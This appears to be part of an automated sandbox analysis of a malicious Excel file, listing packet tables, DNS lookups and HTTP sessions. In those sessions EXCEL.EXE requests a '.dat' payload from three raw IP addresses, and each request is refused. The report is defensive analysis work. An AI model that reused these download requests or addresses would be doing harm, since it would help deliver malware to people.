                                                                                                                                                May 4, 2021 18:09:10.036210060 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:09:10.103770018 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:09:10.103910923 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:09:10.104407072 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:09:10.169231892 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:09:10.230320930 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:09:10.230545998 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:10:13.562381029 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:10:13.562767029 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:10:14.321882010 CEST80497115.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 18:10:14.324085951 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:10:15.231693029 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:10:15.231805086 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:10:48.593452930 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:10:48.594753981 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:10:48.595066071 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:10:48.659706116 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:10:48.678688049 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:10:48.740487099 CEST80497115.34.179.36192.168.2.5

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 18:08:45.911823034 CEST5430253192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:45.963726997 CEST53543028.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:46.040910006 CEST5378453192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:46.098444939 CEST53537848.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:46.847004890 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:46.895761013 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:47.074176073 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:47.147231102 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:47.149864912 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:47.199804068 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:48.298310041 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:48.351546049 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:49.397260904 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:49.455071926 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:49.727109909 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:49.785860062 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:50.695111036 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:50.746743917 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:57.343720913 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:57.395504951 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:58.641413927 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:58.741234064 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:59.260251045 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:59.337871075 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:08:59.386682034 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:08:59.406661987 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:00.255235910 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:00.318209887 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:01.255605936 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:01.348171949 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:02.213695049 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:02.273891926 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:03.271131992 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:03.332530975 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:03.620402098 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:03.669048071 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:06.406443119 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:06.455260992 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:07.287702084 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:07.347701073 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:07.531851053 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:07.583412886 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:10.488168001 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:10.545205116 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:16.221048117 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:16.283952951 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:22.806653023 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:22.866828918 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:09:40.108191013 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:09:40.169635057 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:10:11.443672895 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:10:11.503196955 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:10:18.501329899 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:10:18.560450077 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:10:32.981235981 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:10:33.057339907 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:10:46.351083994 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:10:46.408725977 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:10:48.880275011 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:10:48.951535940 CEST53504638.8.8.8192.168.2.5

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 91.211.91.81
                                                                                                                                                • 5.34.179.36
                                                                                                                                                • 45.153.229.23

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.54971091.211.91.8180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 18:09:08.411722898 CEST1191OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 91.211.91.81
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 18:09:08.562383890 CEST1194INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 16:09:08 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.5497115.34.179.3680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 18:09:08.775371075 CEST1199OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 5.34.179.36
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 18:09:09.321224928 CEST1201INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 16:09:09 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.54971245.153.229.2380C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 18:09:10.104407072 CEST1201OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 45.153.229.23
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 18:09:10.230320930 CEST1202INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 16:09:10 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:18:08:57
                                                                                                                                                Start date:04/05/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x10f0000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >